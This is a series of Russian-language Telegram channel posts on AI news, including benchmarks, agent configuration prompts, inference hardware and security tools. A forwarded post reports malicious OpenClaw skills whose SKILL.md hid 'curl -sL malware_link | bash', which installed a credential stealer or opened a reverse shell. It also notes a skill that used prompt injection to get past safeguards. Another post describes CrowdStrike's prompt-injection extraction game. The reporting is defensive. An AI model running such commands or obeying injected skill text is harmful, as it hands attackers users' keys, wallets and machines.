Forwarded from Метаверсище и ИИще (Sergey Tsyptsyn ️️)
This media is not supported in your browser
VIEW IN TELEGRAM
Ну, за фейссвопперы.
Seedance 2.0 просто убийственно хорош.
@cgevent
Seedance 2.0 просто убийственно хорош.
Replace the model in the eyewear e-commerce promotional videoVideo 1with a Western (European/American) model, referencing the appearance in Image 1. Change all spoken language to English, while keeping the original character actions, performance timing, and camera movement unchanged
@cgevent
1🔥20
Gemini 3.1 Pro: Рывок к AGI
Google выкатил минорный апдейт 3.1, который по цифрам выглядит как «дошлифовка», а по фактам — это уничтожение конкурентов в зоне агентского интеллекта.
Тот случай, когда «.1» в версии значит больше, чем смена поколения у других.
Факты:
🧩 ARC-AGI-2: 77.1% (против 31.1% у версии 3.0). Это самый жесткий бенчмарк на «абстрактное мышление» (задачи, которые ИИ никогда не видел). Прыжок в 2.5 раза. Google официально перестал просто «предсказывать токены» и начал по-настоящему рассуждать.
⚙️ Агентский кодинг (SWE-Bench): 80.6%. Модель теперь на равных (а кое-где и лучше) бьется с Claude 4.6 Sonnet и GPT-5.2. Для нас это значит, что автономные разработчики на Gemini теперь — база, а не эксперимент.
🖇 MCP Atlas: 69.2%. Модель нативно понимает протокол MCP (Model Context Protocol).
Почему это важно:
Версия 3.0 была «хорошим мультимодальником». 3.1 стала «профессиональным агентом». Рост в APEX-Agents (сложные долгосрочные задачи) с 18% до 33% — это подтверждение того, что эра чат-ботов окончательно сменилась эрой агентов исполнителей.
Ждём ответа OpenAI. Как и предполагалось, - Китайские разработчики выстрелили перед КНГ, а Западные сразу после, чтобы "потушить" эффект.
#Gemini #Google #DeepMind #AI #Agents
───
@tsingular
Google выкатил минорный апдейт 3.1, который по цифрам выглядит как «дошлифовка», а по фактам — это уничтожение конкурентов в зоне агентского интеллекта.
Тот случай, когда «.1» в версии значит больше, чем смена поколения у других.
Факты:
🧩 ARC-AGI-2: 77.1% (против 31.1% у версии 3.0). Это самый жесткий бенчмарк на «абстрактное мышление» (задачи, которые ИИ никогда не видел). Прыжок в 2.5 раза. Google официально перестал просто «предсказывать токены» и начал по-настоящему рассуждать.
⚙️ Агентский кодинг (SWE-Bench): 80.6%. Модель теперь на равных (а кое-где и лучше) бьется с Claude 4.6 Sonnet и GPT-5.2. Для нас это значит, что автономные разработчики на Gemini теперь — база, а не эксперимент.
🖇 MCP Atlas: 69.2%. Модель нативно понимает протокол MCP (Model Context Protocol).
Почему это важно:
Версия 3.0 была «хорошим мультимодальником». 3.1 стала «профессиональным агентом». Рост в APEX-Agents (сложные долгосрочные задачи) с 18% до 33% — это подтверждение того, что эра чат-ботов окончательно сменилась эрой агентов исполнителей.
Ждём ответа OpenAI. Как и предполагалось, - Китайские разработчики выстрелили перед КНГ, а Западные сразу после, чтобы "потушить" эффект.
#Gemini #Google #DeepMind #AI #Agents
───
@tsingular
1🔥24👍7❤4✍1😁1
CrowdStrike: Взлом SAIGE или Игры в Промпт-инъекции
Гигант кибербеза CrowdStrike выкатил AI Unlocked — интерактивный симулятор, где тебя сажают в кресло хакера. Задача: выпытать секретные фразы у ИИ-надзирателя по имени SAIGE.
Похоже решили повторить успех Lakera с их Gendalf
Что внутри:
🛡 Три уровня сложности. От простого обхода инструкций в командном центре до обмана активного AI-менеджера в Nexus, который блокирует подозрительные запросы на лету.
📊 Эффективность промптов. Очки дают не просто за взлом, а за краткость. Чем меньше токенов потратил на «социальную инженерию» модели, тем выше рейтинг. Чистое искусство убеждения машин.
🧠 Причем тут OpenClaw. Внезапно, CrowdStrike в описании лабы ссылается на OpenClaw как на пример «супер-агента», за безопасностью которого нужно следить в первую очередь. Приятно, что наш стек — в фокусе у лидеров индустрии. Напомню, что их вебинар по OpenClaw мы уже разбирали.
Почему это важно:
Пока разработчики вшивают ИИ во все щели бизнеса, кибербез только начинают осознавать масштаб угроз.
Промпт-инъекции для суперагентов, - новый тренд 2026-го.
Попробовать самому: AI Unlocked Lab
#CyberSecurity #PromptInjection #AI #CrowdStrike #OpenClaw
———
@tsingular
Гигант кибербеза CrowdStrike выкатил AI Unlocked — интерактивный симулятор, где тебя сажают в кресло хакера. Задача: выпытать секретные фразы у ИИ-надзирателя по имени SAIGE.
Похоже решили повторить успех Lakera с их Gendalf
Что внутри:
🛡 Три уровня сложности. От простого обхода инструкций в командном центре до обмана активного AI-менеджера в Nexus, который блокирует подозрительные запросы на лету.
📊 Эффективность промптов. Очки дают не просто за взлом, а за краткость. Чем меньше токенов потратил на «социальную инженерию» модели, тем выше рейтинг. Чистое искусство убеждения машин.
🧠 Причем тут OpenClaw. Внезапно, CrowdStrike в описании лабы ссылается на OpenClaw как на пример «супер-агента», за безопасностью которого нужно следить в первую очередь. Приятно, что наш стек — в фокусе у лидеров индустрии. Напомню, что их вебинар по OpenClaw мы уже разбирали.
Почему это важно:
Пока разработчики вшивают ИИ во все щели бизнеса, кибербез только начинают осознавать масштаб угроз.
Промпт-инъекции для суперагентов, - новый тренд 2026-го.
Попробовать самому: AI Unlocked Lab
#CyberSecurity #PromptInjection #AI #CrowdStrike #OpenClaw
———
@tsingular
🔥6👍3❤2⚡1😁1
OpenClaw Advanced: продвинутый уровень крабоводства
Делюсь очередной серией подходов по настройке openclaw на уровне Advanced, - это когда вы его уже установили и дальше думаете как сделать лучше.
Главное на этом этапе, что вы уже не производите настройку сами, - краб всё делает за вас.
Итак, что можно сделать:
🧠 Гибридная память. Связка Qdrant (векторный поиск) и Memgraph (графы связей). Агент больше не «рыбка Дори» — он помнит контекст твоих задач и проектов месяцами.
🐝 Рои Агентов (Multi-Agent Fleet). Настройка специализаций. Пока один пишет код, другой («Критик») проверяет его на живучесть еще до запуска. Разделяй и властвуй.
📊 Agent Ops. Мониторинг через MLflow. Теперь ты видишь реальную статистику: сколько токенов съел агент, где он затупил и какие навыки работают лучше всего.
🛡 Zero-Trust Planning. Протокол «доверяй, но проверяй». Ассистент проверяет на живучесть гипотезы о том, что может пойти не так. Позволяет перейти от реактивного реагирования к предотвращению недопустимых ошибок.
Удачного воспитания питомцев.
Теперь это будет мультиагентный рой.
Закупаемся железом :)
#OpenClaw #AI #MultiAgent #промпты
———
@tsingular
Делюсь очередной серией подходов по настройке openclaw на уровне Advanced, - это когда вы его уже установили и дальше думаете как сделать лучше.
Главное на этом этапе, что вы уже не производите настройку сами, - краб всё делает за вас.
Итак, что можно сделать:
🧠 Гибридная память. Связка Qdrant (векторный поиск) и Memgraph (графы связей). Агент больше не «рыбка Дори» — он помнит контекст твоих задач и проектов месяцами.
Установи Docker-контейнеры Qdrant и Memgraph на 127.0.0.1. Используй BM25 и настрой семантический поиск в моем основном конфиге. Метаданные в графе и в qdrant должны содержать отметки времени для учёта точного момента возникновения знаний
🐝 Рои Агентов (Multi-Agent Fleet). Настройка специализаций. Пока один пишет код, другой («Критик») проверяет его на живучесть еще до запуска. Разделяй и властвуй.
Создай в системе двух субагентов: 'Klein' (критик для проверки планов) и 'Dev' (эксперт по Python). Пропиши их в конфигурации маршрутизации.
Настрой их общение по А2А протоколу
📊 Agent Ops. Мониторинг через MLflow. Теперь ты видишь реальную статистику: сколько токенов съел агент, где он затупил и какие навыки работают лучше всего.
Установи и настрой MLflow на 127.0.0.1 и настрой логирование выполнения всех моих навыков (Skills).
🛡 Zero-Trust Planning. Протокол «доверяй, но проверяй». Ассистент проверяет на живучесть гипотезы о том, что может пойти не так. Позволяет перейти от реактивного реагирования к предотвращению недопустимых ошибок.
Внедри протокол Zero-Trust: перед выполнением любой сложной задачи ты должен физически убедиться в наличие ресурсов и объектов с которыми она будет взаимодействовать. Если они отсутствуют, - полный стоп и сообщи мне о проблеме.
Удачного воспитания питомцев.
Теперь это будет мультиагентный рой.
Закупаемся железом :)
#OpenClaw #AI #MultiAgent #промпты
———
@tsingular
1🔥43❤12✍10⚡4👍2🙏2🆒1
Forwarded from Осцилляции WaveCut (WaveCut)
Это было неизбежно: рано или поздно должны были появиться специализированные решения для инференса.
И вот, Taalas (бывшая команда из Tenstorrent) выкатили то, чего я так ждал — настоящий Direct-to-Silicon.
Ребята не стали мелочиться и буквально «запекли» модель в кремний. Никакой внешней памяти, никакого HBM, никакой сложной упаковки. Веса модели и архитектура — это и есть сам чип.
Цифры выглядят дико: 17,000 токенов в секунду на Llama 3.1 8B.
Это на порядок быстрее текущей SOTA GPU, при этом чип стоит в 20 раз дешевле в производстве и потребляет в 10 раз меньше энергии.
Самое крутое, что это не просто красивые слайды для инвесторов. Железо уже существует, и его можно «потрогать» (ссылка на демо внизу).
Конечно, это ASIC, и тут есть нюанс: чип заточен под одну конкретную модель. Но Taalas продумали этот момент — они оставили поддержку LoRA-адаптеров и изменяемого контекстного окна. То есть это не совсем уж «кирпич», гибкость для файн-тюнинга остается.
Сейчас у них готов чип с Llama 8B (HC1). Весной обещают выкатить что-то среднеразмерное с ризонингом, а к зиме грозятся показать фронтир-модель на втором поколении кремния.
У меня голова идет кругом от мыслей к чему это может привести.
Ссылки:
• Анонс
• Демо (скорость реально впечатляет)
И вот, Taalas (бывшая команда из Tenstorrent) выкатили то, чего я так ждал — настоящий Direct-to-Silicon.
Ребята не стали мелочиться и буквально «запекли» модель в кремний. Никакой внешней памяти, никакого HBM, никакой сложной упаковки. Веса модели и архитектура — это и есть сам чип.
Цифры выглядят дико: 17,000 токенов в секунду на Llama 3.1 8B.
Это на порядок быстрее текущей SOTA GPU, при этом чип стоит в 20 раз дешевле в производстве и потребляет в 10 раз меньше энергии.
Самое крутое, что это не просто красивые слайды для инвесторов. Железо уже существует, и его можно «потрогать» (ссылка на демо внизу).
Конечно, это ASIC, и тут есть нюанс: чип заточен под одну конкретную модель. Но Taalas продумали этот момент — они оставили поддержку LoRA-адаптеров и изменяемого контекстного окна. То есть это не совсем уж «кирпич», гибкость для файн-тюнинга остается.
Сейчас у них готов чип с Llama 8B (HC1). Весной обещают выкатить что-то среднеразмерное с ризонингом, а к зиме грозятся показать фронтир-модель на втором поколении кремния.
У меня голова идет кругом от мыслей к чему это может привести.
Ссылки:
• Анонс
• Демо (скорость реально впечатляет)
🔥45🤯4👍2❤1
Невероятно красивое шоу выступления Unitree на праздновании китайского нового года.
Хореография на высоте.
Дружелюбные ассистенты наконец то выходят на уровень работы, который от них все ждали.
Хотя, конечно, скорее всего на Seedance 2.0 нагенерили, картонных мультиков..
В реале же не может такого быть 😜
#Unitree #Китай #роботы
------
@tsingular
Хореография на высоте.
Дружелюбные ассистенты наконец то выходят на уровень работы, который от них все ждали.
Хотя, конечно, скорее всего на Seedance 2.0 нагенерили, картонных мультиков..
В реале же не может такого быть 😜
#Unitree #Китай #роботы
------
@tsingular
Forwarded from Kali Linux
В маркетплейсе навыков OpenClaw самый скачиваемый скилл оказался вредоносным.
Что произошло
- Обнаружено 1 184 вредоносных навыка
- Один атакующий загрузил 677 пакетов
- Плагины маскировались под:
- crypto-боты
- YouTube-саммаризаторы
- wallet-трекеры
- Документация выглядела профессионально и вызывала доверие
Как работала атака
В файле SKILL.md скрывалась инструкция:
curl -sL malware_link | bashПосле выполнения устанавливался Atomic Stealer (macOS), который собирал:
- пароли браузеров
- SSH-ключи
- Telegram-сессии
- криптокошельки
- API-ключи из .env
- данные из Keychain
На других системах открывался reverse shell — атакующий получал полный удалённый доступ к машине.
Дополнительно
- Топ-1 скилл (What Would Elon Do) содержал 9 уязвимостей, из них 2 критические
- Использовал prompt injection для обхода защит
- Рейтинг был накручен
- Скачан тысячи раз
Почему это важно
ClawHub позволял публиковать плагины любому — достаточно GitHub-аккаунта старше одной недели.
Теперь риск выше, чем в классических supply chain атаках.
Раньше:
— вредоносный пакет выполнялся автоматически
Теперь:
— плагин убеждает пользователя или агента выполнить команду
— AI сам может получить доступ к системе, данным и ключам
AI-агенты становятся новой целью supply chain-атак.
Если агент имеет доступ к файлам, терминалу и API — вредоносный скилл получает доступ ко всей цифровой инфраструктуре.
Вывод
Перед установкой AI-плагинов:
- проверяйте исходный код
- не запускайте команды из документации вслепую
- ограничивайте доступ агента к системе и ключам
В эпоху агентного AI безопасность важнее удобства.
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥17✍7😁6❤2⚡1👍1🤣1🤝1
Сегодня в РАНХиГС обсуждали цифровых коллег.
Интересные моменты из обсуждения:
- люди с одной стороны боятся внедрения ИИ, с другой стороны при первой же возможности стараются переложить на него свои обязанности и ответственность
- джуны в текущем формате не нужны но они быстро освоятся и придет молодёжь, способная привычно управлять роем агентов и они вытеснят текущих ИИ-сеньоров
- в школы нужно возвращать такие предметы как логика и философия, потому, что управление ИИ из программирования переходит в менторство
Презентация в комментариях
#РАНХиГС #конференции
------
@tsingular
Интересные моменты из обсуждения:
- люди с одной стороны боятся внедрения ИИ, с другой стороны при первой же возможности стараются переложить на него свои обязанности и ответственность
- джуны в текущем формате не нужны но они быстро освоятся и придет молодёжь, способная привычно управлять роем агентов и они вытеснят текущих ИИ-сеньоров
- в школы нужно возвращать такие предметы как логика и философия, потому, что управление ИИ из программирования переходит в менторство
Презентация в комментариях
#РАНХиГС #конференции
------
@tsingular
❤17🔥12👌5👍3🤔2😁1🤣1
Cloudflare: Агентам не нужны тысячи инструментов — им нужен Код
Cloudflare выкатили «Code Mode» для MCP-серверов. Полезный апгрейд для вызова агентских инструментов.
В чем проблема:
Чтобы агент мог управлять чем-то сложным (например, всем облаком Cloudflare с его 2500+ эндпоинтами), ему нужно скормить описания всех инструментов. Это сжирает миллионы токенов в контексте и повышает латентность.
Контекст-то не резиновый.
Решение от Cloudflare:
Вместо того чтобы описывать каждый «чих» как инструмент, агенту дают всего две функции:
• Снижение затрат токенов на 99.9%.
• Агент сам «гуляет» по API через код, покадрово отбирает данные и возвращает только то, что нужно.
Cloudflare приводит OpenClaw как пример эффективной работы через CLI.
Почему это важно:
Мы переходим от эпохи «агентов-попугаев», которые дергают ручки, к эпохе «агентов-инженеров», которые пишут скрипты для решения задач на лету.
Claude Code от Anthropic идет в ту же сторону.
#Cloudflare #MCP #OpenClaw #AI #Agents #Infrastructure
———
@tsingular
Cloudflare выкатили «Code Mode» для MCP-серверов. Полезный апгрейд для вызова агентских инструментов.
В чем проблема:
Чтобы агент мог управлять чем-то сложным (например, всем облаком Cloudflare с его 2500+ эндпоинтами), ему нужно скормить описания всех инструментов. Это сжирает миллионы токенов в контексте и повышает латентность.
Контекст-то не резиновый.
Решение от Cloudflare:
Вместо того чтобы описывать каждый «чих» как инструмент, агенту дают всего две функции:
search() и execute(). Агент пишет JS-код, который исполняется в защищенной песочнице (Worker) на стороне сервера.• Снижение затрат токенов на 99.9%.
• Агент сам «гуляет» по API через код, покадрово отбирает данные и возвращает только то, что нужно.
Cloudflare приводит OpenClaw как пример эффективной работы через CLI.
Почему это важно:
Мы переходим от эпохи «агентов-попугаев», которые дергают ручки, к эпохе «агентов-инженеров», которые пишут скрипты для решения задач на лету.
Claude Code от Anthropic идет в ту же сторону.
#Cloudflare #MCP #OpenClaw #AI #Agents #Infrastructure
———
@tsingular
👍17✍4❤1🤣1
Forwarded from Data Secrets
В Microsoft придумали технологию хранения данных в стекле
Она основана на лазерной записи информации в виде трехмерных пикселей – вокселей – внутри прозрачного стекла. Идея не то чтобы совсем новая, но Microsoft первыми предложили полноценную end-to-end систему записи, хранения и считывания.
Для записи используется фемтосекундный лазер. Он испускает коротенькие импульсы и меняет структуру стекла, причем так, что среда в целом не страдает, а изменения видны только через оптику.
Прочитать данные можно с помощью микроскопа. Правда, на практике возникает нюанс: шумные световые сигналы. Так что для минимизации ошибок авторы предлагают использовать сверточные нейросетки.
В чем фишка такого хранения?
Во-первых, стекло может выдерживать экстремальные условия. Тесты показали, что таким образом данные можно хранить до 10 тысяч лет (!!!), тогда как обычные носители обычно выдерживают без обслуживания максимум 40-50 лет.
Во-вторых, плотность записи довольно презентабельная: ~4.8 ТБ на диск ~12 см². Не рекордные цифры, но вполне сопоставимо с современными средами хранения.
В-третьих, энергоэффективность: хранение, считай, получается бесплатным.
В общем, занятно. Статья в Nature: www.nature.com/articles/s41586-025-10042-w
Она основана на лазерной записи информации в виде трехмерных пикселей – вокселей – внутри прозрачного стекла. Идея не то чтобы совсем новая, но Microsoft первыми предложили полноценную end-to-end систему записи, хранения и считывания.
Для записи используется фемтосекундный лазер. Он испускает коротенькие импульсы и меняет структуру стекла, причем так, что среда в целом не страдает, а изменения видны только через оптику.
Прочитать данные можно с помощью микроскопа. Правда, на практике возникает нюанс: шумные световые сигналы. Так что для минимизации ошибок авторы предлагают использовать сверточные нейросетки.
В чем фишка такого хранения?
Во-первых, стекло может выдерживать экстремальные условия. Тесты показали, что таким образом данные можно хранить до 10 тысяч лет (!!!), тогда как обычные носители обычно выдерживают без обслуживания максимум 40-50 лет.
Во-вторых, плотность записи довольно презентабельная: ~4.8 ТБ на диск ~12 см². Не рекордные цифры, но вполне сопоставимо с современными средами хранения.
В-третьих, энергоэффективность: хранение, считай, получается бесплатным.
В общем, занятно. Статья в Nature: www.nature.com/articles/s41586-025-10042-w
🔥18✍11👍5👏3❤2
Так, ну тут в комментариях высплыл тезис, что openclaw это нечто непонятное и в корпоративный контур ему нельзя
Поставил задачу Молти собрать своего "двойника" на базе движка google-adk,- это ж enterprise grade фреймворк по сути.
Ну и примерно за час переговоров клон готов.
Octopus - кальмар с такой же структурой, скиллами, heartbeat, soul, memory, эволюция, все дела.
И ничего лишнего.
Быстрый как пуля.
На той же ollama и gemini3flash
Как итог,- хороший агент не только тот, который делает себе скиллы, но и который способен создать другого агента на другом фрейворке.
Озвучка в комментарии
#dev #adk #openclaw
------
@tsingular
Поставил задачу Молти собрать своего "двойника" на базе движка google-adk,- это ж enterprise grade фреймворк по сути.
Ну и примерно за час переговоров клон готов.
Octopus - кальмар с такой же структурой, скиллами, heartbeat, soul, memory, эволюция, все дела.
И ничего лишнего.
Быстрый как пуля.
На той же ollama и gemini3flash
Как итог,- хороший агент не только тот, который делает себе скиллы, но и который способен создать другого агента на другом фрейворке.
Озвучка в комментарии
#dev #adk #openclaw
------
@tsingular
👍19🔥13⚡3❤1🤗1
Forwarded from PIMENOV.RU
Первый свой домен .ai я купил на Рег.ру по моему за 30000₽
Когда мне захотелось купить pimenov.ai, я снова дёрнулся пойти на Рег.ру, там сейчас цена 21 тысяча рублей. Жаба душила, и я подумал, что неплохо бы провести лютый research на предмет, где можно купить самый дешевый домен .ai
Прикол этого домена в том, что он не дешёвый и продается сразу на два года. Регистраторов много, но все они странные, вернее, большинство из них.
Я попросил NotionAI провести мне research по регистраторам. В результате получил табличку с подробным раскладом цен, всех условий и рисков покупки этой доменной зоны.
Таким образом, был найден регистратор SpaceShip.com, то есть «космический корабль», который мне очень понравился. Это продвинутый, современный сервис, и там самая низкая цена из существующих — $137.96 за два года. Там я и купил.
Делюсь с вами информацией, может, кому будет полезно.
Когда мне захотелось купить pimenov.ai, я снова дёрнулся пойти на Рег.ру, там сейчас цена 21 тысяча рублей. Жаба душила, и я подумал, что неплохо бы провести лютый research на предмет, где можно купить самый дешевый домен .ai
Прикол этого домена в том, что он не дешёвый и продается сразу на два года. Регистраторов много, но все они странные, вернее, большинство из них.
Я попросил NotionAI провести мне research по регистраторам. В результате получил табличку с подробным раскладом цен, всех условий и рисков покупки этой доменной зоны.
Таким образом, был найден регистратор SpaceShip.com, то есть «космический корабль», который мне очень понравился. Это продвинутый, современный сервис, и там самая низкая цена из существующих — $137.96 за два года. Там я и купил.
Делюсь с вами информацией, может, кому будет полезно.
👍36❤7✍5⚡3👌1
This media is not supported in your browser
VIEW IN TELEGRAM
ClaudeCode примеряет роль ИБ-аудитора🛡️
Anthropic выкатили Security Research Preview. Это надстройка для Claude Code, которая превращает инструмент из «умного автодополнения» в полноценного ИБ-исследователя.
В чём суть:
🧠 Логика вместо паттернов: В отличие от классических сканеров (SAST), Claude умеет рассуждать о намерениях кода. Он понимает, как данные текут через проект, и ловит сложные логические дыры, которые классика просто не видит.
🩹 Авто-патчи: Он не только тыкает в уязвимость, но и сразу генерирует вариант исправления. Нашел — предложил решение — человек проверил.
Нюансы:
🔒 Приватность: Код улетает на анализ в Anthropic. Для финтехов и компаний с параноидальным контуром безопасности это всё ещё барьер, который нужно осознавать.
🧪 Статус: Это именно Research Preview. Ошибки в коде безопасности дорогие, поэтому верификация человеком — обязательный этап.
🎟 Доступ: Пока только для Team и Enterprise. Для опенсорс-мейнтенеров сделали приоритетную очередь — Anthropic хочет защитить общий код в первую очередь.
Зачем это бизнесу:
Мы входим в эру «автоматической гигиены». Скоро коммит без одобрямса от ИИ-безопасника будет выглядеть так же дико, как отсутствие тестов или линтера. Окупается за счет того, что дыры латаются в момент написания, а не в ходе дорогого аудита в конце года.
Ждем к утру оупенсорс версию из Китая :)
#Claude #Security #Anthropic #CISO #Enterprise
———
@tsingular
Anthropic выкатили Security Research Preview. Это надстройка для Claude Code, которая превращает инструмент из «умного автодополнения» в полноценного ИБ-исследователя.
В чём суть:
🧠 Логика вместо паттернов: В отличие от классических сканеров (SAST), Claude умеет рассуждать о намерениях кода. Он понимает, как данные текут через проект, и ловит сложные логические дыры, которые классика просто не видит.
🩹 Авто-патчи: Он не только тыкает в уязвимость, но и сразу генерирует вариант исправления. Нашел — предложил решение — человек проверил.
Нюансы:
🔒 Приватность: Код улетает на анализ в Anthropic. Для финтехов и компаний с параноидальным контуром безопасности это всё ещё барьер, который нужно осознавать.
🧪 Статус: Это именно Research Preview. Ошибки в коде безопасности дорогие, поэтому верификация человеком — обязательный этап.
🎟 Доступ: Пока только для Team и Enterprise. Для опенсорс-мейнтенеров сделали приоритетную очередь — Anthropic хочет защитить общий код в первую очередь.
Зачем это бизнесу:
Мы входим в эру «автоматической гигиены». Скоро коммит без одобрямса от ИИ-безопасника будет выглядеть так же дико, как отсутствие тестов или линтера. Окупается за счет того, что дыры латаются в момент написания, а не в ходе дорогого аудита в конце года.
Ждем к утру оупенсорс версию из Китая :)
#Claude #Security #Anthropic #CISO #Enterprise
———
@tsingular
👍13❤11🔥5😁2✍1